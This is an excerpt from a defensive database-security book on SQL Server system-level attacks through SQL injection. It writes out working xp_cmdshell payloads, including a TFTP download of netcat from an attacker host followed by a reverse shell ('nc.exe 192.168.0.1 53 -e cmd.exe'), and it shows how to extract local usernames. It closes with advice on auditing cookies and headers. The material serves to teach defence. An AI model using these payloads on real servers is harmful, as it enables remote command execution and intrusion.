System-level SQL Server attacks

The following excerpt, courtesy of Wiley Publishing, is from Chapter 22 of the book "The Database Hacker's Handbook: Defending Database Servers" written by David Litchfield, Chris Anley, John Heasman and Bill Grindlay. Click for the complete book excerpt series or purchase the book.

System level attacks

If the vulnerable application is connecting to the database with system administrator privileges, attacks can be launched on the operating system itself.Commands can be executed using xp_cmdshell:

'; exec master..xp_cmdshell 'dir > C:dir.txt' —

Requesting a DNS lookup of the attacker's machine (the non-routable 192.168.0.1 in this example) verifies that commands are executed; DNS queries on TCP port 53 are often allowed out through corporate firewalls:

 '; exec master..xp_cmdshell 'nslookup foobar 192.168.0.1' —

Running a packet sniffer such as Ethereal, a DNS query arrives containing the internal IP address of the database server. If permitted by the SQL Server's firewall the attacker may attempt to gain a remote shell by instructing the server to download the network tool netcat from a TFTP (trivial file transfer protocol) server running on his machine:

'; exec master..xp_cmdshell 'tftp –I 192.168.0.1 GET nc.exe c:nc.exe' —

'; exec master..xp_cmdshell 'C:nc.exe 192.168.0.1 53 –e cmd.exe' —

The usual technique for viewing command-line responses is to insert the information into a temporary table and then retrieve it using the previously detailed approaches, either through error message information or by using time delays. The local Windows usernames on the server can be exported using

'; create table test(num int identity(1,1), data(4096)); insert into
test exec xp_cmdshell 'cmd /c net user' —

The usernames can then be viewed line by line using

' or 1 in (select data from test where num = 1)--
' or 1 in (select data from test where num = 2)--
' or 1 in (select data from test where num = 3)--
etc...

Alternative Attack Vectors

SQL injection can also occur if an application takes a value such as a session identifier from a user-supplied cookie. Care should be taken that equally stringent input validation is applied to values received from cookies, as is applied to those from form fields and URL query strings.

Web applications can extract information from many different sources, such as the HTTP request headers (Accept, User-Agent, Host, and so on) provided by web browsers when connecting to a server. These are often written to a database in order to generate user statistics, such as the prevalence of certain browsers or operating systems, and could open up a web application to SQL injection if incorrectly handled.

Both filenames and registry keys and their values may be utilized by a web application to form queries, and should also be audited for SQL injection.

Click for the next excerpt in this series: Time delays

Click for the complete book excerpt series.

Digg This!     StumbleUpon     Del.icio.us

RELATED CONTENT SQL Server Security Password cracking tools for SQL Server Meet compliance requirements with improved database security practices Hardening the network and OS for SQL Server security Securing the server and database in SQL Server SQL Server security made simple and sensible Blog: Protect your databases from the internal threat Setting up SQL Server Service Broker for secure communication The keys to database backup protection for SQL Server Understanding transparent data encryption in SQL Server 2008 The fine line between not encrypting your databases and breach notification

RELATED GLOSSARY TERMS Terms from Whatis.com − the technology online dictionary data corruption  (SearchSQLServer.com) data hiding  (SearchSQLServer.com)

RELATED RESOURCES 2020software.com, trial software downloads for accounting software, ERP software, CRM software and business software systems Search Bitpipe.com for the latest white papers and business webcasts Whatis.com, the online computer dictionary